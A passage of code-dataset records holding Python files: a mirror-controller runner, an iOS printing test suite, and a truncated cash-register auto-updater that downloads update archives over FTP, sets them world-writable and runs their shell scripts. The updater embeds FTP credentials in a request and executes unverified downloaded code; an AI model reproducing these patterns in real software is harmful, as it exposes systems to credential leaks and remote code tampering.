'1', l))\n print(' '.join(list(binary_sorted)))\n","sub_path":"geeks_for_geeks/sorting/binary_array_sorting.py","file_name":"binary_array_sorting.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"100290513","text":"import os\nimport time\nfrom plico.utils.base_runner import BaseRunner\nfrom plico.utils.logger import Logger\nfrom plico.utils.decorator import override\nfrom plico.utils.control_loop import FaultTolerantControlLoop\nfrom palpao_server.mirror_controller.simulated_deformable_mirror import \\\n SimulatedDeformableMirror\nfrom palpao_server.mirror_controller.deformable_mirror_controller import \\\n DeformableMirrorController\nfrom plico.rpc.zmq_ports import ZmqPorts\nfrom palpao.calibration.calibration_manager import CalibrationManager\nfrom palpao_server.mirror_controller.bmc_deformable_mirror import \\\n BmcDeformableMirror\nfrom palpao_server.mirror_controller.alpao_deformable_mirror import \\\n AlpaoDeformableMirror\nimport sys\n\n\n\nclass Runner(BaseRunner):\n\n RUNNING_MESSAGE = \"Mirror controller is running.\"\n\n def __init__(self):\n BaseRunner.__init__(self)\n\n\n def _tryGetDefaultFlatTag(self):\n try:\n mirrorDeviceSection= self.configuration.getValue(\n self.getConfigurationSection(), 'mirror')\n return self.configuration.getValue(\n mirrorDeviceSection, 'default_flat_tag')\n except KeyError as e:\n self._logger.warn(str(e))\n return None\n\n\n def _createDeformableMirrorDevice(self):\n mirrorDeviceSection= self.configuration.getValue(\n self.getConfigurationSection(), 'mirror')\n mirrorModel= self.configuration.deviceModel(mirrorDeviceSection)\n if mirrorModel == 'simulatedMEMSMultiDM':\n self._createSimulatedDeformableMirror(mirrorDeviceSection)\n elif mirrorModel == 'simulatedDM':\n self._createSimulatedDeformableMirror(mirrorDeviceSection)\n elif mirrorModel == 'alpaoDM':\n self._createAlpaoMirror(mirrorDeviceSection)\n elif mirrorModel == 'piTipTilt':\n self._createPITipTiltMirror(mirrorDeviceSection)\n elif mirrorModel == 'bmc':\n self._createBmcDeformableMirror(mirrorDeviceSection)\n else:\n raise KeyError('Unsupported mirror model %s' % mirrorModel)\n\n\n def _createSimulatedDeformableMirror(self, mirrorDeviceSection):\n dmSerialNumber= self.configuration.getValue(\n mirrorDeviceSection, 'serial_number')\n self._mirror= SimulatedDeformableMirror(dmSerialNumber)\n\n\n def _createAlpaoMirror(self, mirrorDeviceSection):\n serialNumber= str(self.configuration.getValue(mirrorDeviceSection,\n 'serial_number'))\n self._logger.notice(\"Creating ALPAO device SN %s\" % serialNumber)\n libFolder= self.configuration.getValue(mirrorDeviceSection,\n 'lib_folder')\n sys.path.append(libFolder)\n from asdk import DM\n alpaoDm= DM(serialNumber)\n self._mirror= AlpaoDeformableMirror(alpaoDm, serialNumber)\n self._logger.notice(\"ALPAO device SN %s created\" % serialNumber)\n\n\n def _createBmcDeformableMirror(self, mirrorDeviceSection):\n serialNumber= self.configuration.getValue(mirrorDeviceSection,\n 'serial_number')\n self._logger.notice(\"Creating BMC device SN %s\" % serialNumber)\n import bmc\n bmcDm= bmc.BmcDm()\n self._logger.notice(\"BMC version <%s>\" % bmcDm.version_string())\n self._mirror= BmcDeformableMirror(bmcDm, serialNumber)\n\n\n def _createPITipTiltMirror(self, mirrorDeviceSection):\n from palpao_server.mirror_controller.pi_tip_tilt_mirror \\\n import PhysikInstrumenteTipTiltMirror\n from pi_gcs.gcs2 import GeneralCommandSet2\n from pi_gcs.tip_tilt_2_axes import TipTilt2Axis\n\n hostname= self.configuration.getValue(\n mirrorDeviceSection, 'ip_address')\n serialNumber= self.configuration.getValue(mirrorDeviceSection,\n 'serial_number')\n cfg= self._calibrationManager.loadPiTipTiltCalibration(\n serialNumber)\n cfg.hostname= hostname\n gcs=GeneralCommandSet2()\n tt=TipTilt2Axis(gcs, cfg)\n tt.setUp()\n self._mirror= PhysikInstrumenteTipTiltMirror(\n serialNumber, tt)\n\n\n def _createCalibrationManager(self):\n calibrationRootDir= self.configuration.calibrationRootDir()\n self._calibrationManager= CalibrationManager(calibrationRootDir)\n\n\n def _setUp(self):\n self._logger= Logger.of(\"Deformable Mirror Controller runner\")\n\n self._zmqPorts= ZmqPorts.fromConfiguration(\n self.configuration, self.getConfigurationSection())\n self._replySocket = self.rpc().replySocket(\n self._zmqPorts.SERVER_REPLY_PORT)\n self._statusSocket = self.rpc().publisherSocket(\n self._zmqPorts.SERVER_STATUS_PORT)\n\n self._logger.notice('reply socket on port %d' %\n self._zmqPorts.SERVER_REPLY_PORT)\n self._logger.notice('status socket on port %d' %\n self._zmqPorts.SERVER_STATUS_PORT)\n\n self._createCalibrationManager()\n\n self._createDeformableMirrorDevice()\n\n flatFileTag= self._tryGetDefaultFlatTag()\n\n self._logger.notice(\"Creating DeformableMirrorController\")\n self._controller= DeformableMirrorController(\n self.name,\n self._zmqPorts,\n self._mirror,\n self._replySocket,\n self._statusSocket,\n self.rpc(),\n self._calibrationManager,\n flatFileTag)\n\n\n def _runLoop(self):\n self._logRunning()\n\n FaultTolerantControlLoop(\n self._controller,\n Logger.of(\"Deformable Mirror Controller control loop\"),\n time,\n 0.001).start()\n self._logger.notice(\"Terminated\")\n\n\n @override\n def run(self):\n self._setUp()\n self._runLoop()\n return os.EX_OK\n\n\n @override\n def terminate(self, signal, frame):\n self._controller.terminate()\n","sub_path":"palpao_server/mirror_controller/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"16136410","text":"import pytest\n\nfrom MobileApps.libs.flows.ios.smart.flow_container import FlowContainer\nfrom MobileApps.resources.const.ios.const import *\n\npytest.app_info = \"SMART\"\n\nclass Test_Suite_10_Printing_File_Formats(object):\n @pytest.fixture(scope=\"class\", autouse=\"true\")\n def class_setup(cls, request, session_setup, load_printers_session):\n cls = cls.__class__\n cls.driver = session_setup\n cls.fc = FlowContainer(cls.driver)\n cls.p = load_printers_session\n cls.home = cls.fc.fd[\"home\"]\n cls.preview = cls.fc.fd[\"preview\"]\n cls.sys_config = ma_misc.load_system_config_file()\n cls.stack = request.config.getoption(\"--stack\")\n cls.file_name = \"4pages\"\n cls.fc.go_home(stack=cls.stack)\n cls.fc.add_printer_by_ip(cls.p.get_printer_information()[\"ip address\"])\n \n @pytest.mark.parametrize(\"document_format\",[\"pdf\",\"txt\",\"docx\",\"xlsx\"])\n def test_01_verify_printing_different_document_formats(self, document_format):\n \"\"\"\n C27655278 - PDF\n C27655279 - TXT\n C27655280 - DOC\n C27655282 - XLS\n \"\"\" \n self.fc.navigate_to_google_drive_in_files()\n self.fc.select_file_in_google_drive(file_type=document_format, file_name=self.file_name)\n self.preview.verify_preview_screen()\n self.fc.fd[\"preview\"].dismiss_print_preview_coach_mark()\n self.fc.select_print_button_and_verify_print_job(self.p)\n \n @pytest.mark.parametrize(\"image_format\",[\"jpg\",\"png\",\"bmp\",\"tif\"])\n def test_02_verify_printing_different_image_formats(self, image_format):\n \"\"\"\n C27655274 - JPG\n C27655275 - PNG\n C27655276 - BMP\n C27655277 - TIFF\n \"\"\"\n if image_format == \"jpg\":\n file_name = \"fish\"\n elif image_format == \"png\":\n file_name = \"pikachu\"\n elif image_format == \"tif\":\n file_name = \"green_automation\"\n elif image_format == \"bmp\":\n file_name = \"test_bmp\"\n else:\n file_name = \"motorbike\"\n self.fc.navigate_to_google_drive_in_files()\n self.fc.select_file_in_google_drive(file_type=image_format, file_name=file_name)\n self.preview.verify_preview_screen()\n self.fc.fd[\"preview\"].dismiss_print_preview_coach_mark()\n self.fc.select_print_button_and_verify_print_job(self.p)","sub_path":"tests/ios/smart/functionality/printing/test_suite_10_prinitng_file_formats.py","file_name":"test_suite_10_prinitng_file_formats.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"413404563","text":"#! /usr/bin/python3\r\n# ! coding: utf-8\r\n\r\nimport ftplib\r\nimport logging\r\nimport logging.handlers\r\nimport os\r\nimport shutil\r\nimport zipfile\r\nfrom subprocess import Popen, PIPE\r\nfrom xml.dom import minidom\r\nimport requests\r\nimport check_flash_card_connection\r\nimport handling_logs\r\nimport handling_settings\r\nimport argparse\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom tkinter import ttk\r\nfrom progressbar import *\r\n\r\nparameters_file = 'Settings.ini'\r\ntmp_catalog_for_install_updates = \"{}/for_installation\".format(os.getcwd())\r\npath_to_install_CU = '/home/cblock/'\r\npath_for_this_script = os.getcwd()\r\nsystem_path_media = \"/media/cashier\"\r\nversion = 'ver:1.03(04.12.2019)'\r\nnow_time = time.strftime('%H-%M-%S')\r\ntime_upload_log = time.strftime('%d-%m-%y')\r\nnow_date = time.strftime('%d-%m-%y')\r\nglobal_log = 'Log/Auto-update{}.log'.format(now_date)\r\nif not os.path.exists('Log'):\r\n os.mkdir('Log')\r\n\r\nhistory_log = \"/home/cashier/scripts/Admin_updater/Log/history.log\"\r\nif not os.path.exists(history_log):\r\n os.system('touch {}'.format(history_log))\r\n\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.INFO)\r\nlog_file = logging.FileHandler(global_log)\r\nlog_file.setLevel(logging.INFO)\r\nlog_file.setFormatter(logging.Formatter(u'[LINE:%(lineno)d]# %(levelname)-8s[%(asctime)s] %(message)s'))\r\nlog_console = logging.StreamHandler()\r\nlog_console.setLevel(logging.ERROR)\r\nlogger.addHandler(log_console)\r\nlogger.addHandler(log_file)\r\n\r\n\r\ndef parser():\r\n pars = argparse.ArgumentParser()\r\n pars.add_argument('-u', '--update', type=str, default=None, help='Введите имя обновления, пример: -u upd0001')\r\n pars.add_argument('-l', '--list', action='store_true', help='Выводит список доступных обновлений на сервере')\r\n pars.add_argument('-w', '--window', action='store_true', help='Открывает оконный интерфейс')\r\n pars.add_argument('-s', '--start_user', action='store_true', help='Запуск пользователем из меню')\r\n pars.add_argument('-v', '--version', action='store_true', help='Версия: {}'.format(version))\r\n\r\n return pars\r\n\r\n\r\nkey_parser = parser()\r\nnamespace = key_parser.parse_args()\r\n\r\n\r\nclass FtpClient:\r\n\r\n def __init__(self, ftp_path, connect_ftp=None):\r\n try:\r\n self.ftp_path = ftp_path\r\n self.connect_ftp = connect_ftp\r\n self.key_ftp_host = parameters_ini.get('Global', 'ftp_host')\r\n self.key_ftp_user = parameters_ini.get('Global', 'ftp_user')\r\n self.ftp_pass = parameters_ini.get('Global', 'ftp_pass')\r\n connect_ftp = ftplib.FTP(self.key_ftp_host, self.key_ftp_user, self.ftp_pass, timeout=10)\r\n connect_ftp.encoding = 'UTF-8'\r\n connect_ftp.cwd(ftp_path)\r\n self.path_list = connect_ftp.nlst()\r\n connect_ftp.close()\r\n except Exception as all_error:\r\n logger.exception(\"Error connect FTP\\n {}\".format(all_error))\r\n\r\n def download_upd(self, name, ini=False):\r\n \"\"\" This function connect to FTP and download update \"\"\"\r\n try:\r\n if not ini:\r\n os.chdir(tmp_catalog_for_install_updates)\r\n self.connect_ftp = ftplib.FTP(self.key_ftp_host, self.key_ftp_user, self.ftp_pass)\r\n self.connect_ftp.encoding = 'UTF-8'\r\n self.connect_ftp.cwd(self.ftp_path)\r\n if not ini:\r\n name = \"{}.zip\".format(name)\r\n with open(\"{}\".format(name), 'wb') as upd_file:\r\n response = self.connect_ftp.retrbinary('RETR ' + \"{}\".format(name), upd_file.write)\r\n self.connect_ftp.close()\r\n if not response.startswith(\"226\"):\r\n logger.info('Error\\n: {}'.format(response))\r\n else:\r\n logger.info('Download : {}'.format(name))\r\n os.chdir(path_for_this_script)\r\n except ftplib.all_errors as ftp_error:\r\n logger.exception('Error connect to FTP\\n {}'.format(ftp_error))\r\n raise ConnectionError\r\n except Exception as all_error:\r\n logger.exception('Error connect to FTP\\n {}'.format(all_error))\r\n raise ConnectionError\r\n\r\n def upload_log(self, name):\r\n \"\"\" This function connect to FTP and upload log-file \"\"\"\r\n ftp_log_path = parameters_ini.get('Global', 'ftp_path_logs')\r\n log_name = name.split('/')[-1]\r\n local_path_log = \"/home/cashier/scripts/Admin_updater/Log/{}\".format(log_name)\r\n self.connect_ftp = ftplib.FTP(self.key_ftp_host, self.key_ftp_user, self.ftp_pass)\r\n self.connect_ftp.cwd(\"{}/{}\".format(ftp_log_path, log_name.split('.')[0]))\r\n if os.path.exists(local_path_log):\r\n new_name = \"({})({})({}).log\".format(system_name, log_name.split('.')[0], time_upload_log)\r\n shutil.copy(local_path_log, new_name)\r\n try:\r\n with open(new_name, 'rb') as file:\r\n response_upload_log = self.connect_ftp.storlines(\"STOR \" + new_name, file)\r\n file.close()\r\n if not response_upload_log.startswith(\"226 Transfer complete\"):\r\n with open(new_name, 'rb') as file:\r\n self.connect_ftp.storlines(\"STOR \" + new_name, file)\r\n file.close()\r\n except ftplib.all_errors as ftp_error:\r\n logger.exception('Error connect to FTP\\n {}'.format(ftp_error))\r\n raise ConnectionError\r\n except Exception as all_error:\r\n logger.exception('Error Upload log: {}'.format(all_error))\r\n raise ConnectionError\r\n finally:\r\n os.remove(local_path_log)\r\n\r\n def upload_error_task(self, name, path):\r\n \"\"\" This function connect to FTP and upload new task, because no correct install update. \"\"\"\r\n try:\r\n self.connect_ftp = ftplib.FTP(self.key_ftp_host, self.key_ftp_user, self.ftp_pass)\r\n self.connect_ftp.cwd(path)\r\n with open(name, 'rb') as file:\r\n response_upload_log = self.connect_ftp.storlines(\"STOR \" + name, file)\r\n logger.info('Upload in FTP error task {}'.format(name))\r\n if not response_upload_log.startswith(\"226 Transfer complete\"):\r\n with open(name, 'rb') as file:\r\n self.connect_ftp.storlines(\"STOR \" + name, file)\r\n except ftplib.all_errors as ftp_error:\r\n logger.exception('Error connect to FTP\\n {}'.format(ftp_error))\r\n raise ConnectionError\r\n except Exception as all_error:\r\n logger.error('Error Upload error task: {}'.format(all_error))\r\n raise ConnectionError\r\n\r\n def del_task(self, task, path):\r\n \"\"\" This function connect to FTP and delete task. \"\"\"\r\n try:\r\n self.connect_ftp = ftplib.FTP(self.key_ftp_host, self.key_ftp_user, self.ftp_pass)\r\n self.connect_ftp.encoding = 'UTF-8'\r\n self.connect_ftp.cwd(path)\r\n self.connect_ftp.delete(task)\r\n self.connect_ftp.close()\r\n except Exception as del_error:\r\n logger.error('Error delete task: {} in ftp\\n{}'.format(task, del_error))\r\n\r\n\r\ndef show_message(title, message):\r\n \"\"\" This function create message box. \"\"\"\r\n try:\r\n global console\r\n if not console:\r\n root = Tk()\r\n root.withdraw()\r\n messagebox.showinfo(title, message)\r\n root.destroy()\r\n else:\r\n logger.critical(\"{}\\n{}\".format(title, message))\r\n except Exception as fail:\r\n logger.critical(\"Error tkinter message\\n {}\".format(fail))\r\n\r\n\r\ndef copy_file(name_file, path):\r\n \"\"\" This function copy file. \"\"\"\r\n try:\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n shutil.copy(name_file, path)\r\n except OSError as os_error:\r\n logger.exception('Error copy file: {}\\n Exit script.'.format(os_error))\r\n raise SystemExit(\"ошибка при копировании файлов\\nСмотрите лог файл\")\r\n except Exception as global_error:\r\n logger.exception('Unexpected error:\\n{}'.format(global_error))\r\n\r\n\r\ndef get_update_name(flash, name, path_task_in_ftp):\r\n \"\"\" This function search update name in FTP or flash card. \"\"\"\r\n\r\n def update_name_in_flash(path_upd_in_flash):\r\n updates_list = []\r\n list_updates_in_flash = os.listdir(path_upd_in_flash)\r\n for element in list_updates_in_flash:\r\n if element.endswith('.zip'):\r\n updates_list.append(element)\r\n list_updates_in_flash = sorted(updates_list, reverse=True)\r\n name_update = list_updates_in_flash[0]\r\n logger.info('Flash found update {}'.format(name_update))\r\n return name_update\r\n\r\n def update_name_in_ftp(name_system, path_task):\r\n list_updates_for_install = []\r\n count_task = 0\r\n try:\r\n list_task = FtpClient(ftp_path=path_task).path_list\r\n except Exception as fail:\r\n raise ConnectionError(fail)\r\n for task in list_task:\r\n if task.split(\"_\")[0] == name_system and task.endswith('.new_task'):\r\n count_task += 1\r\n logger.error('Found task in Ftp server: {}'.format(task))\r\n list_updates_for_install.append(task.split('_')[1].split('.')[0])\r\n if count_task == 0:\r\n logger.error('NO updates file found on Ftp server for: Terminal Number({})'.format(system_name))\r\n return list_updates_for_install\r\n\r\n try:\r\n if not flash:\r\n update_name_to_install = update_name_in_ftp(name, path_task_in_ftp)\r\n else:\r\n update_name_to_install = update_name_in_flash(flash)\r\n return update_name_to_install\r\n except IndexError as index_err:\r\n logger.error(index_err)\r\n except ConnectionError as connect_error:\r\n raise ConnectionError(connect_error)\r\n except Exception as all_error:\r\n raise Exception(all_error)\r\n\r\n\r\ndef download_arch_updates(flash, updates_name, ftp_path_updates):\r\n \"\"\" This function connect to FTP and download zip arch update. \"\"\"\r\n local_path_upd_file = \"{}/{}\".format(flash, updates_name)\r\n\r\n os.makedirs(tmp_catalog_for_install_updates, mode=0o0777)\r\n if not flash:\r\n download_update = FtpClient(ftp_path=ftp_path_updates)\r\n list_upd = download_update.path_list\r\n logger.info('Updates in FTP server\\n{}'.format(list_upd))\r\n for download_name in updates_name:\r\n logger.info(\"{}.zip\".format(download_name))\r\n if \"{}.zip\".format(download_name) in list_upd:\r\n download_update.download_upd(download_name)\r\n logger.info('Successfully download {}'.format(download_name))\r\n ftp_task_path = parameters_ini.get('Global', 'ftp_path_tasks')\r\n download_update.del_task(\"{}_{}.new_task\".format(system_name, download_name.split(\".\")[0]),\r\n ftp_task_path)\r\n else:\r\n logger.info('Updates not found in updates list')\r\n raise SystemExit(\"Обновления не найдены\")\r\n else:\r\n copy_file(local_path_upd_file, tmp_catalog_for_install_updates)\r\n logger.info('{} copied to {}'.format(updates_name, tmp_catalog_for_install_updates))\r\n\r\n\r\ndef unzip_upd(path):\r\n for name in os.listdir(path):\r\n name_path_upd = name.split(\".\")[0]\r\n full_path_upd = \"{}/{}\".format(path, name_path_upd)\r\n upd_zip = \"{}/{}\".format(path, name)\r\n if not os.path.exists(full_path_upd):\r\n os.makedirs(full_path_upd)\r\n try:\r\n with zipfile.ZipFile(upd_zip, 'r') as result_zip:\r\n logger.info('Open Zip {}'.format(name))\r\n result_zip.extractall(full_path_upd)\r\n logger.info('Successfully unzip: {}'.format(name))\r\n except zipfile.BadZipFile as zip_error:\r\n logger.exception('Bad Zip\\n{}'.format(zip_error))\r\n except Exception as global_error:\r\n logger.exception('Unexpected error:\\n{}'.format(global_error))\r\n finally:\r\n os.remove(upd_zip)\r\n\r\n\r\ndef search_local_upd_for_install(enable_flash, path):\r\n list_result = []\r\n final_result = []\r\n for name_path in os.listdir(path):\r\n result_install = install_upd(\"{}/{}\".format(path, name_path), enable_flash)\r\n list_result.append(\"{}={}\".format(name_path, result_install))\r\n shutil.rmtree(tmp_catalog_for_install_updates)\r\n os.chdir(path_for_this_script)\r\n for result_upd in list_result:\r\n if result_upd.find('Fail_CU_Fail_PC') != -1:\r\n final_result.append(\"{} = Установка не удалась, смотрите лог-файл\".format(result_upd.split(\"=\")[0]))\r\n if result_upd.find('Fail_CU_0') != -1:\r\n final_result.append(\"{} = Блок управления(Ошибка), Касса(Успешно)\".format(result_upd.split(\"=\")[0]))\r\n if result_upd.find('0_Fail_PC') != -1:\r\n final_result.append(\"{} = Блок управления(Успешно), Касса(Ошибка)\".format(result_upd.split(\"=\")[0]))\r\n if result_upd.split('=')[1] == '0':\r\n final_result.append(\"{} = Успешно\".format(result_upd.split(\"=\")[0]))\r\n final_result = '\\n'.join(result for result in final_result)\r\n show_message('Результат обновления', \"{}\".format(final_result))\r\n\r\n\r\ndef install_upd(path_name, enable_flash):\r\n global tmp_log, unload_ftp\r\n\r\n def search_install_log(path):\r\n log = ''\r\n if path != \"/home/cblock/\":\r\n os.chdir(path.split('_')[1])\r\n for file_log in os.listdir(path):\r\n if not file_log.find('.log') == -1:\r\n with open(\"./{}/{}\".format(path, file_log), 'r') as file:\r\n log = file.read()\r\n else:\r\n os.chdir(path)\r\n for file_log in os.listdir(path):\r\n if not file_log.find('.log') == -1:\r\n os.system('sudo -u cblock chmod 777 {}'.format(file_log))\r\n with open(\"{}{}\".format(path, file_log), 'r') as file:\r\n log = file.read()\r\n os.chdir(tmp_catalog_for_install_updates)\r\n return log\r\n\r\n def install_pc(name_upd_pc):\r\n result_installation_pc = 0\r\n path_upd_name = name_upd_pc.split(\".\")[0]\r\n name_update = path_upd_name.split('_')[1]\r\n for file in os.listdir(path_upd_name):\r\n os.chmod(\"{}/{}\".format(path_upd_name, file), 0o0777)\r\n logger.info('Chmod 777 {}/{}'.format(path_upd_name, file))\r\n os.chdir(path_upd_name)\r\n start_upd = Popen('./{}.sh'.format(name_update), shell=True, stdout=PIPE, stderr=PIPE)\r\n start_upd.wait()\r\n stdout_log = start_upd.communicate()[1].decode()\r\n if not start_upd.returncode == 0:\r\n logger.error('Error install UPD {}.sh,\\nError:\\n{}.'.format(name_update, stdout_log))\r\n result_installation_pc = 1\r\n else:\r\n logger.info('Successfully install: {}.sh'.format(name_update))\r\n os.chdir(tmp_catalog_for_install_updates)\r\n return result_installation_pc\r\n\r\n def install_old_pc(path_upd_name):\r\n result_installation_pc = 0\r\n upd_name = path_upd_name.split('/')[-1]\r\n for file in os.listdir(path_upd_name):\r\n os.chmod(\"{}/{}\".format(path_upd_name, file), 0o0777)\r\n logger.info('Chmod 777 {}/{}'.format(path_upd_name, file))\r\n os.chdir(path_upd_name)\r\n os.getcwd()\r\n start_upd = Popen('./{}.sh'.format(upd_name), shell=True, stdout=PIPE, stderr=PIPE)\r\n start_upd.wait()\r\n stdout_log = start_upd.communicate()[1].decode()\r\n if not start_upd.returncode == 0:\r\n logger.error('Error install UPD {}.sh,\\nError:\\n{}.'.format(upd_name, stdout_log))\r\n result_installation_pc = 1\r\n else:\r\n logger.info('Successfully install: {}.sh'.format(upd_name))\r\n os.chdir(tmp_catalog_for_install_updates)\r\n return result_installation_pc\r\n\r\n def install_cu(name_upd_cb, flash=False):\r\n result_installation_cb = 0\r\n path_upd_name = name_upd_cb.split(\".\")[0]\r\n for file in os.listdir(path_upd_name):\r\n upd_dir_name = file.split('.')[0]\r\n copy_file(\"{}/{}\".format(path_upd_name, file), path_to_install_CU)\r\n logger.info(\"{} copy to /home/cblock/\".format(file))\r\n try:\r\n if requests.get('http://{}/comm.php'.format(parameters_ini.get('Global', 'host_cu')), timeout=5).ok:\r\n connect = requests.post(\r\n 'http://{}/comm.php'.format(parameters_ini.get('Global', 'host_cu')),\r\n ''\r\n 'AutoUpdateFTP://cblock:kcolbc@XXX.XXX.XXX.XXX//'\r\n '/home/cblock'\r\n '{}'\r\n ''.format(file)\r\n )\r\n\r\n os.remove(\"{}/{}\".format(path_to_install_CU, file))\r\n logger.info(\"delete /home/cblock/{}\".format(file))\r\n response_xml = minidom.parseString(connect.text)\r\n if response_xml.getElementsByTagName('ErrorDesc'):\r\n logger.info('Error response CU:\\n {}'.format(connect.text))\r\n result_installation_cb = 1\r\n else:\r\n logger.info('Successfully install in CU ==> {}'.format(upd_dir_name))\r\n except Exception as request_error:\r\n show_message('Ошибка', 'Ошибка при загрузке обновления в Блок управления.\\n\\n{}'.format(request_error))\r\n logger.exception('Error response CU\\n{}'.format(request_error))\r\n result_installation_cb = 1\r\n if not flash:\r\n ftp_task_path = parameters_ini.get('Global', 'ftp_path_tasks')\r\n unload_ftp.del_task(\"{}_{}.new_task\".format(system_name, path_upd_name.split(\"_\")[1]), ftp_task_path)\r\n os.chdir(tmp_catalog_for_install_updates)\r\n return result_installation_cb\r\n\r\n def unzip_update(name):\r\n with zipfile.ZipFile(name, 'r') as result_zip:\r\n logger.info('Open Zip {}'.format(name))\r\n result_zip.extractall(name.split(\".\")[0])\r\n result_zip.close()\r\n logger.info('Successfully unzip: {}'.format(name))\r\n os.remove(name)\r\n\r\n result_install = 0\r\n result_install_cu = 0\r\n result_install_pc = 0\r\n ftp_path = parameters_ini.get('Global', 'ftp_path_logs')\r\n try:\r\n tmp_log = ''\r\n if not enable_flash:\r\n unload_ftp = FtpClient(ftp_path=ftp_path)\r\n if len(cash_ini.get('GLOBAL', 'TerninalNumber')) == 8:\r\n # If len terminal number == 8, start upd from old KSA\r\n # os.chdir(path_name)\r\n result_install = install_old_pc(path_name)\r\n for file_log in os.listdir(path_name):\r\n if not file_log.find('.log') == -1:\r\n with open(\"./{}/{}\".format(path_name, file_log), 'r') as file:\r\n tmp_log += file.read()\r\n if result_install != 0:\r\n result_install = 'Fail_PC'\r\n else:\r\n # If len terminal number != 8, start upd from new KSA\r\n for name_upd in os.listdir(path_name):\r\n os.chdir(path_name)\r\n if name_upd.startswith(\"CU\"):\r\n unzip_update(name_upd)\r\n result_install_cu = install_cu(name_upd, enable_flash)\r\n tmp_log += search_install_log(name_upd.split('.')[0])\r\n tmp_log += search_install_log(\"/home/cblock/\")\r\n if result_install_cu != 0:\r\n result_install_cu = 'Fail_CU'\r\n elif name_upd.startswith(\"PC\"):\r\n unzip_update(name_upd)\r\n result_install_pc = install_pc(name_upd)\r\n tmp_log += search_install_log(name_upd.split('.')[0])\r\n tmp_log += search_install_log(\"/home/cblock/\")\r\n if result_install_pc != 0:\r\n result_install_pc = 'Fail_PC'\r\n if result_install != result_install_cu or result_install != result_install_pc:\r\n result_install = '{}_{}'.format(result_install_cu, result_install_pc)\r\n upd_path = (name_upd.split('.')[0]).split('_')[1]\r\n new_task = '{}_({})_{}'.format(result_install, system_name, upd_path)\r\n if not enable_flash:\r\n file_task = open(new_task, \"w\")\r\n file_task.close()\r\n ftp_path = parameters_ini.get('Global', 'ftp_path_tasks')\r\n unload_ftp.upload_error_task(new_task, ftp_path)\r\n else:\r\n logger.info(new_task)\r\n if tmp_log:\r\n log_name = \"/home/cashier/scripts/Admin_updater/Log/{}.log\".format(path_name.split('/')[-1])\r\n with open(log_name, 'w') as upd_log:\r\n upd_log.write(tmp_log)\r\n if not enable_flash:\r\n unload_ftp.upload_log(log_name)\r\n else:\r\n copy_file(log_name, check_flash_card_connection.search_flash(system_path_media, upd_path_in_flash))\r\n os.remove(log_name)\r\n else:\r\n log_name = \"/home/cashier/scripts/Admin_updater/Log/{}.log\".format(path_name.split('/')[-1])\r\n with open(log_name, 'w') as log:\r\n log.write('{} {} {} Result install {}'.format(path_name.split('/')[-1], time_upload_log, now_time,\r\n result_install))\r\n\r\n if not enable_flash:\r\n unload_ftp = FtpClient(ftp_path=ftp_path)\r\n unload_ftp.upload_log(log_name)\r\n with open(history_log, 'a') as history:\r\n history.write('\\n{} {} {} Result install {}'.format(path_name.split('/')[-1], time_upload_log, now_time,\r\n result_install))\r\n os.chdir(tmp_catalog_for_install_updates)\r\n return result_install\r\n except Exception as global_error:\r\n logger.exception('Unexpected error:\\n{}'.format(global_error))\r\n show_message(\"Ошибка\", global_error)\r\n raise SystemExit(global_error)\r\n\r\n\r\ndef gui_module():\r\n global console, check_flash\r\n\r\n def select_close():\r\n try:\r\n logger.info('Close program')\r\n raise SystemExit\r\n except Exception as errors:\r\n logger.error('Error \\n {}'.format(errors))\r\n\r\n def read_list_upd():\r\n try:\r\n updates_list = FtpClient(ftp_path=ftp_path_upd)\r\n updates_comments = parameters_ini.get('Global', 'upd_comments')\r\n updates_list.download_upd(updates_comments, ini=True)\r\n updates_comments = handling_settings.read_ini(updates_comments, 'cp1251')\r\n \"\"\"This is function connects to ftp server, reads list\r\n of available updates for installation,\r\n and displays the user in a listbox for selection.\"\"\"\r\n\r\n listbox.delete(0, END)\r\n for name_update in updates_list.path_list:\r\n if name_update.endswith('.zip') and updates_comments.has_option('Global', name_update):\r\n listbox.insert(END, (\"{} = {}\".format(name_update, updates_comments.get('Global', name_update))))\r\n except ftplib.all_errors as ftp_error:\r\n logger.error('Error \\n {}'.format(ftp_error))\r\n\r\n def download_update():\r\n global console, check_flash\r\n if listbox.curselection():\r\n value = listbox.curselection()\r\n status_bar['value'] = 20\r\n status_bar.update()\r\n name = listbox.get(value)\r\n status_bar['value'] = 40\r\n status_bar.update()\r\n logger.info(\"Key {}\".format(name))\r\n console = False\r\n check_flash = False\r\n download_arch_updates(check_flash, [name.split(\".zip\")[0]], ftp_path_upd)\r\n status_bar['value'] = 60\r\n status_bar.update()\r\n unzip_upd(tmp_catalog_for_install_updates)\r\n status_bar['value'] = 80\r\n status_bar.update()\r\n search_local_upd_for_install(check_flash, tmp_catalog_for_install_updates)\r\n status_bar['value'] = 100\r\n status_bar.update()\r\n else:\r\n show_message('Ошибка', 'Не выбрано обновление для установки.')\r\n\r\n def auto_install():\r\n global console, check_flash\r\n logger.info(\"Not found key\")\r\n console = False\r\n status_bar['value'] = 20\r\n status_bar.update()\r\n check_flash = check_flash_card_connection.search_flash(system_path_media, upd_path_in_flash)\r\n status_bar['value'] = 30\r\n status_bar.update()\r\n name_update = get_update_name(check_flash, system_name, ftp_path_task)\r\n status_bar['value'] = 40\r\n status_bar.update()\r\n\r\n if name_update:\r\n download_arch_updates(check_flash, name_update, ftp_path_upd)\r\n status_bar['value'] = 60\r\n status_bar.update()\r\n unzip_upd(tmp_catalog_for_install_updates)\r\n status_bar['value'] = 80\r\n status_bar.update()\r\n search_local_upd_for_install(check_flash, tmp_catalog_for_install_updates)\r\n else:\r\n show_message(\"Ошибка\", \"Обновления для этой кассы\\nне найдены\")\r\n\r\n status_bar['value'] = 100\r\n status_bar.update()\r\n\r\n def get_help():\r\n reference = '''Данная программа предназначена для просмотра \\n\r\n и установки доступных обнавлений. Кассовой программы и оборудования.\\n \r\n Принцип работы:\\n\r\n 1. Выбрать из списка доступных обновлений.\\n\r\n 2. Нажать на кнопку Скачать и установить обновление\\n\r\n 3. Ждать сообщения о результате установке '''\r\n window_help = 